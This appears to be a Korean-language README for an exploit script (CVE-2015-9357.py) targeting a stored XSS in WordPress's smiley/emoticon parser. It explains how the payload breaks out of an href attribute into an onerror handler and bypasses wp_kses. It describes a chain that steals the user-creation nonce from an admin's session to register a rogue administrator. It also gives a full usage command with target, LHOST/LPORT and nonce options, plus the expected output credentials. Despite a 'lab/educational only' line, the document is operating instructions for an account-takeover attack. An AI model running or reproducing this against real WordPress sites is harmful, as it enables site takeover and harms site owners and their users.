
wordpress 스마일리/이모티콘 파서의 저장형 XSS, 위조된 nonce 요청을 통한 관리자 계정 생성.
이모티콘 정규식을 통해 <a href> 속성 컨텍스트를 벗어나 onerror 핸들러에 JS를 삽입합니다. script 태그가 필요 없으며, 영향을 받는 필드에서 wp_kses 필터링을 우회합니다.
공격 체인: 스마일리로 변환되는 임의의 필드에 페이로드를 제출하면, 관리자가 이를 조회할 때 해당 세션에서 XSS가 실행됩니다. user-new.php에서 사용자 생성 nonce를 가져와 새 관리자 계정을 등록하고, 로그인으로 확인합니다.
실험실/교육용으로만 사용하세요. 대상 필드가 실제로 wordpress 스마일리 변환을 적용해야 하며, 테마/플러그인에 따라 다릅니다.
원본 취약점 공개: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
python3 CVE-2015-9357.py -t https://target -l LHOST -p LPORT \
--endpoint https://target/wp-admin/admin-ajax.php \
--field message --action <ajax_action> --nonce <nonce> \
--data "name=a,[email protected],phone=a"
--endpoint / --field는 취약한 입력이 실제로 존재하는 위치(댓글, 문의 양식 등)에 따라 다르므로, 먼저 수동으로 찾아야 합니다.
성공 시 출력: 관리자 자격 증명(pwned / Password123!) 및 wp-admin URL.